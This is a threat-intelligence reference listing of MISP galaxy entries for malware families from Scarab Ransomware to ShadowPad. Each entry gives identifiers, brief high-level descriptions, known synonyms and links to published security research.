type | [] |
Scarab Ransomware
Internal MISP references
UUID c1ccba65-e2f0-4f29-8e04-6b119c7f8694
which can be used as unique global reference for Scarab Ransomware
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.scarab_ransom - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf - webarchive
- https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf - webarchive
- https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/ - webarchive
- https://www.welivesecurity.com/en/eset-research/cosmicbeetle-steps-up-probation-period-ransomhub/ - webarchive
- http://malware-traffic-analysis.net/2017/11/23/index.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ScareCrow
Based on the leaked Conti source code.
Internal MISP references
UUID 7e8e41de-b3f8-4c2b-a9fe-e1aa6532e76b
which can be used as unique global reference for ScareCrow
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Schneiken
Schneiken is a VBS 'Double-dropper'. It comes with two RATs embedded in the code (Dunihi and Ratty). The entire code is Base64-encoded.
Internal MISP references
UUID 92a65c89-acc3-4ee7-8db0-f0ea293ed12d
which can be used as unique global reference for Schneiken
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Scieron
According to SentinelLABS, the Chinese threat actor has used a custom backdoor dubbed "Scieron" for years across several campaigns.
Internal MISP references
UUID e343583b-8338-42ea-af60-311578146151
which can be used as unique global reference for Scieron
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.scieron - webarchive
- https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview - webarchive
- https://www.sentinelone.com/labs/chinese-threat-actor-scarab-targeting-ukraine - webarchive
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=8bfa7311-fdd9-4f8d-b813-1ab6c9d2c363 - webarchive
- https://www.sentinelone.com/labs/chinese-threat-actor-scarab-targeting-ukraine/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Scote
Internal MISP references
UUID 8c764bd6-2c6e-4cb2-93e3-f805cd99fe1e
which can be used as unique global reference for Scote
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Scout
A downloader that uses Windows messages to control its execution flow.
Internal MISP references
UUID ca16e8fa-5a86-48be-82ca-40a666b8692b
which can be used as unique global reference for Scout
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Scranos
Internal MISP references
UUID b5d90140-f307-402c-9d7f-9cdf21a7cb31
which can be used as unique global reference for Scranos
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.scranos - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/271/Bitdefender-Whitepaper-Scranos-2.pdf - webarchive
- https://labs.bitdefender.com/2019/04/inside-scranos-a-cross-platform-rootkit-enabled-spyware-operation/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ScreenCap
SentinelOne describes this malware as capable of screen capture and keylogging. It is used by a threat cluster they named WIP19, targeting telecommunications and IT service providers in the Middle East and Asia.
Internal MISP references
UUID cba2db46-268c-4203-a982-3bf9985c91a4
which can be used as unique global reference for ScreenCap
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ScreenLocker
Internal MISP references
UUID 9803b201-28e5-40c5-b661-c1a191388072
which can be used as unique global reference for ScreenLocker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ScrubCrypt
ScrubCrypt is the rebranded "Jlaive" crypter, with the unique capability of .BAT packing.
Internal MISP references
UUID 6f597339-7eac-4885-b888-bf8a81bca7b3
which can be used as unique global reference for ScrubCrypt
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.scrubcrypter - webarchive
- https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/scrubcrypt-the-rebirth-of-jlaive - webarchive
- https://perception-point.io/blog/the-rebranded-crypter-scrubcrypt/ - webarchive
- https://0xtoxin.github.io/threat%20breakdown/ScrubCrypt-Rebirth-Of-Jlaive/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SDBbot
Internal MISP references
UUID 48bbf0b7-d8c3-4ddb-8498-cf8e72b210d8
which can be used as unique global reference for SDBbot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sdbbot - webarchive
- https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/ - webarchive
- https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/ - webarchive
- https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824 - webarchive
- https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/ - webarchive
- https://vblocalhost.com/uploads/VB2020-Jung.pdf - webarchive
- https://www.cyber.gov.au/acsc/view-all-content/alerts/sdbbot-targeting-health-sector - webarchive
- https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do - webarchive
- https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672 - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://github.com/Tera0017/SDBbot-Unpacker - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf - webarchive
- https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.96_ENG.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-tahoe - webarchive
- https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104 - webarchive
- https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546 - webarchive
- https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/ - webarchive
- https://intel471.com/blog/a-brief-history-of-ta505 - webarchive
- https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader - webarchive
- https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SEADADDY
Backdoor written in Python 2, deployed with PyInstaller.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SEADADDY.
Known Synonyms |
---|
SeaDuke |
Seadask |
Internal MISP references
UUID 1d07212e-6292-40a4-a5e9-30aef83b6207
which can be used as unique global reference for SEADADDY
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.seadaddy - webarchive
- https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/ - webarchive
- https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html - webarchive
- https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/ - webarchive
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=6ab66701-25d7-4685-ae9d-93d63708a11c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SeaSalt
Internal MISP references
UUID d66f466a-e70e-4b62-9a04-d62eb41da15c
which can be used as unique global reference for SeaSalt
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SectopRAT
SectopRAT, aka ArechClient2, is a .NET RAT with numerous capabilities including multiple stealth functions. Arechclient2 can profile victim systems, steal information such as browser and crypto-wallet data, and launch a hidden secondary desktop to control browser sessions. Additionally, it has several anti-VM and anti-emulator capabilities.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SectopRAT.
Known Synonyms |
---|
1xxbot |
ArechClient |
Internal MISP references
UUID a7e3b468-399c-419c-87d5-4efcea8ec0cc
which can be used as unique global reference for SectopRAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sectop_rat - webarchive
- https://vxhive.blogspot.com/2021/01/deep-dive-into-sectoprat.html - webarchive
- https://www.cisecurity.org/insights/blog/top-10-malware-march-2022 - webarchive
- https://www.gdatasoftware.com/blog/2021/02/36633-new-version-adds-encrypted-communication - webarchive
- https://cdn-production.blackpointcyber.com/wp-content/uploads/2022/11/01161208/Blackpoint-Cyber-Ratting-out-Arechclient2-Whitepaper.pdf - webarchive
- https://dr4k0nia.github.io/posts/Analysing-a-sample-of-ArechClient2/ - webarchive
- https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ - webarchive
- https://tampabay.tech/2022/11/30/arechclient2/ - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-alert-widely-abused-msix-app-installer-disabled-by-microsoft-active-iocs - webarchive
- https://www.elastic.co/security-labs/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks - webarchive
- https://www.gdatasoftware.com/blog/2019/11/35548-new-sectoprat-remote-access-malware-utilizes-second-desktop-to-control-browsers - webarchive
- https://medium.com/@joshuapenny88/hostinghunter-series-chang-way-technologies-co-limited-a9ba4fce0f65 - webarchive
- https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/ - webarchive
- https://medium.com/@gi7w0rm/a-long-way-to-sectoprat-eb2f0aad6ec8 - webarchive
- https://cyberflorida.org/2022/11/arechclient2/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SeDll
Internal MISP references
UUID 272268bb-2715-476b-a121-49142581c559
which can be used as unique global reference for SeDll
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sedll - webarchive
- https://www.recordedfuture.com/chinese-threat-actor-tempperiscope/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets - webarchive
- https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-mohawk - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sedreco
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sedreco.
Known Synonyms |
---|
azzy |
eviltoss |
Internal MISP references
UUID 21ab9e14-602a-4a76-a308-dbf5d6a91d75
which can be used as unique global reference for Sedreco
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sedreco - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-twilight - webarchive
- https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/ - webarchive
- https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf - webarchive
- https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html - webarchive
- https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/ - webarchive
- http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf - webarchive
- http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf - webarchive
- https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf - webarchive
- http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware_15.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Seduploader
Simple tool that facilitates the download and persistence of a next-stage tool. It collects system information and metadata, probably in an attempt to tell sandbox environments apart from real targets on the server side, and uses domains of search engines like Google to check for Internet connectivity. Strings are obfuscated with XOR using a 16-byte key.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Seduploader.
Known Synonyms |
---|
GAMEFISH |
carberplike |
downrage |
jhuhugit |
jkeyskw |
Internal MISP references
UUID 6bd20349-1231-4aaa-ba2a-f4b09d3b344c
which can be used as unique global reference for Seduploader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.seduploader - webarchive
- https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/ - webarchive
- https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government - webarchive
- http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/ - webarchive
- https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf - webarchive
- https://securelist.com/a-slice-of-2017-sofacy-activity/83930/ - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-twilight - webarchive
- http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf - webarchive
- http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html - webarchive
- https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf - webarchive
- https://blog.xpnsec.com/apt28-hospitality-malware-part-2/ - webarchive
- https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployed - webarchive
- http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/ - webarchive
- https://www.emanueledelucia.net/apt28-sofacy-seduploader-under-the-christmas-tree/ - webarchive
- https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html - webarchive
- https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/ - webarchive
- https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html - webarchive
- https://researchcenter.paloaltonetworks.com/2016/06/unit42-new-sofacy-attacks-against-us-government-agency/ - webarchive
- https://blog.yoroi.company/research/apt28-and-upcoming-elections-possible-interference-signals-part-ii/ - webarchive
- https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
seinup
Internal MISP references
UUID 9789dfe8-d156-4f19-8177-25718dd14f1f
which can be used as unique global reference for seinup
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sekhmet
According to PCrisk, Sekhmet is ransomware. This malicious program operates by encrypting data and demanding ransom payments for decryption. During the encryption process, all affected files are appended with an extension, consisting of random characters (e.g. ".HrUSsw", ".WNgh", ".NdWfEr", etc.).
Internal MISP references
UUID b4b4e8c8-fc66-4618-ba35-75f21d7d6922
which can be used as unique global reference for Sekhmet
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sekhmet - webarchive
- https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/ - webarchive
- https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3 - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/ - webarchive
- https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/ - webarchive
- https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/ - webarchive
- https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/ - webarchive
- https://id-ransomware.blogspot.com/2020/03/sekhmet-ransomware.html - webarchive
- https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis - webarchive
- https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SelfMake Loader
Internal MISP references
UUID 2ef98145-45b8-4acf-ba28-71f495581387
which can be used as unique global reference for SelfMake Loader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SendSafe
Internal MISP references
UUID 503ca41c-7788-477c-869b-ac530f20c490
which can be used as unique global reference for SendSafe
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SepSys
Ransomware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SepSys.
Known Synonyms |
---|
Silvertor Ransomware |
Internal MISP references
UUID 08f37434-4aba-439f-afae-fed61f411ac4
which can be used as unique global reference for SepSys
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sepulcher
Internal MISP references
UUID 6025475a-b89d-401d-882d-50fe1b03154f
which can be used as unique global reference for Sepulcher
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sepulcher - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/chinese-apt-ta413-resumes-targeting-tibet-following-covid-19-themed-economic - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SerialVlogger
This malware is protected using VMProtect and related to the loading of KEYPLUG.
Internal MISP references
UUID 0592daf4-5f68-4087-ad4e-efe773009ca6
which can be used as unique global reference for SerialVlogger
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Serpent Stealer
Internal MISP references
UUID 446f7e21-f4d0-4725-b1fb-254b090c3e4f
which can be used as unique global reference for Serpent Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Serpico
Internal MISP references
UUID 0d4ca924-7e7e-4385-b14d-f504b4d206e5
which can be used as unique global reference for Serpico
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ServHelper
ServHelper is written in Delphi and, according to Proofpoint, is best classified as a backdoor.
Proofpoint noticed two distinct variants, "tunnel" and "downloader" (citation): "The 'tunnel' variant has more features and focuses on setting up reverse SSH tunnels to allow the threat actor to access the infected host via Remote Desktop Protocol (RDP). Once ServHelper establishes remote desktop access, the malware contains functionality for the threat actor to 'hijack' legitimate user accounts or their web browser profiles and use them as they see fit. The 'downloader' variant is stripped of the tunneling and hijacking functionality and is used as a basic downloader."
Internal MISP references
UUID cebfa7af-8c31-4dda-8373-82893c7f43f4
which can be used as unique global reference for ServHelper
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.servhelper - webarchive
- https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/ - webarchive
- https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/ - webarchive
- https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html - webarchive
- https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/ - webarchive
- https://prodaft.com/m/reports/TeslaGun_TLPWHITE.pdf - webarchive
- https://medium.com/walmartglobaltech/ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56 - webarchive
- https://securitynews.sonicwall.com/xmlpost/servhelper-2-0-enriched-with-bot-capabilities-and-allow-remote-desktop-access/ - webarchive
- https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware - webarchive
- https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/servhelper-evolution-and-new-ta505-campaigns/ - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part2/ - webarchive
- https://www.gdatasoftware.com/blog/2020/07/36122-hidden-miners - webarchive
- https://www.binarydefense.com/an-updated-servhelper-tunnel-variant/ - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-tahoe - webarchive
- https://intel471.com/blog/a-brief-history-of-ta505 - webarchive
- https://www.prodaft.com/m/reports/TeslaGun_TLPWHITE.pdf - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf - webarchive
- https://insights.oem.avira.com/ta505-apt-group-targets-americas/ - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505 - webarchive
- https://ti.360.net/blog/articles/excel-4.0-macro-utilized-by-ta505-to-target-financial-institutions-recently-en/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SessionManager
A malicious IIS module that allows upload and download of files, remote command execution, and using the compromised server as a hop into the network behind it.
Internal MISP references
UUID 2ed6f7dc-32ba-4799-87b6-8867e8182cec
which can be used as unique global reference for SessionManager
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sfile
Ransomware
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sfile.
Known Synonyms |
---|
Escal |
Morseop |
Internal MISP references
UUID 6899dd08-a94b-4e76-813e-1b8437d23aa4
which can be used as unique global reference for Sfile
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sfile - webarchive
- https://www.sentinelone.com/blog/from-the-front-lines-another-rebrand-mindware-and-sfile-ransomware-technical-breakdown/ - webarchive
- https://id-ransomware.blogspot.com/2020/02/sfile2-ransomware.html - webarchive
- https://twitter.com/GrujaRS/status/1296856836944076802?s=20 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
shadowhammer
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular shadowhammer.
Known Synonyms |
---|
DAYJOB |
Internal MISP references
UUID 51728278-a95c-45a5-9ae0-9897d41d0efb
which can be used as unique global reference for shadowhammer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowhammer - webarchive
- https://norfolkinfosec.com/possible-shadowhammer-targeting-low-confidence/ - webarchive
- https://labsblog.f-secure.com/2019/03/29/a-hammer-lurking-in-the-shadows - webarchive
- https://blog.reversinglabs.com/blog/forging-the-shadowhammer - webarchive
- https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html - webarchive
- https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/ - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf - webarchive
- https://skylightcyber.com/2019/03/28/unleash-the-hash-shadowhammer-mac-list/ - webarchive
- https://norfolkinfosec.com/the-first-stage-of-shadowhammer/ - webarchive
- https://www.youtube.com/watch?v=T5wPwvLrBYU - webarchive
- https://www.vkremez.com/2019/03/lets-learn-dissecting-operation.html - webarchive
- https://securelist.com/apt-trends-report-q2-2020/97937/ - webarchive
- https://securelist.com/operation-shadowhammer/89992/ - webarchive
- https://blog.f-secure.com/a-hammer-lurking-in-the-shadows/ - webarchive
- https://countercept.com/blog/analysis-shadowhammer-asus-attack-first-stage-payload/ - webarchive
- https://mauronz.github.io/shadowhammer-backdoor - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ShadowPad
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ShadowPad.
Known Synonyms |
---|
POISONPLUG.SHADOW |
XShellGhost |
Internal MISP references
UUID e089e945-a523-4d11-a135-396f9b6c1dc7
which can be used as unique global reference for ShadowPad
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad - webarchive
- https://conference.hitb.org/hitbsecconf2021sin/materials/D1T1%20-%20%20ShadowPad%20-%20A%20Masterpiece%20of%20Privately%20Sold%20Malware%20in%20Chinese%20Espionage%20-%20Yi-Jhen%20Hsieh%20&%20Joey%20Chen.pdf - webarchive
- https://www.welivesecurity.com/2022/09/06/worok-big-picture/ - webarchive
- https://www.youtube.com/watch?v=r1zAVX_HnJg - webarchive
- https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf - webarchive
- https://securelist.com/shadowpad-in-corporate-networks/81432/ - webarchive
- https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf - webarchive
- https://www.ic3.gov/Media/News/2021/211220.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf - webarchive
- https://www.trendmicro.com/en_us/research/24/c/earth-krahang.html - webarchive
- https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/ - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2022/slides/VB2022-Tracking-the-entire-iceberg.pdf - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf - webarchive
- https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf - webarchive
- https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html - webarchive
- https://community.riskiq.com/article/d8b749f2 - webarchive
- https://hunt.io/blog/tracking-shadowpad-infrastructure-via-non-standard-certificates - webarchive
- https://www.pwc.co.uk/issues/cyber-security-services/research/chasing-shadows.html - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Possible-supply-chain-attack-targeting-South-Asian-government-delivers-Shadowpad.pdf - webarchive
- https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/ - webarchive
- https://attack.mitre.org/groups/G0096 - webarchive
- https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf - webarchive
- https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf - webarchive
- https://www.theregister.com/2022/04/08/china_sponsored_attacks_india_ukraine/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage - webarchive
- https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021 - webarchive
- https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/ - webarchive
- https://www.youtube.com/watch?v=IRh6R8o1Q7U - webarchive
- https://securelist.com/apt-trends-report-q2-2020/97937/ - webarchive
- https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/ - webarchive
- https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/ - webarchive
- https://therecord.media/redecho-group-parks-domains-after-public-exposure/ - webarchive
- https://research.nccgroup.com/2022/09/30/a-glimpse-into-the-shadowy-realm-of-a-chinese-apt-detailed-analysis-of-a-shadowpad-intrusion/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2024-1209.pdf - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf - webarchive
- https://www.youtube.com/watch?v=_fstHQSK-kk - webarchive
- https://www.reliaquest.com/blog/anxun-and-chinese-apt-activity/ - webarchive
- https://www.youtube.com/watch?v=i52MH-YFEeo - webarchive
- https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/ - webarchive
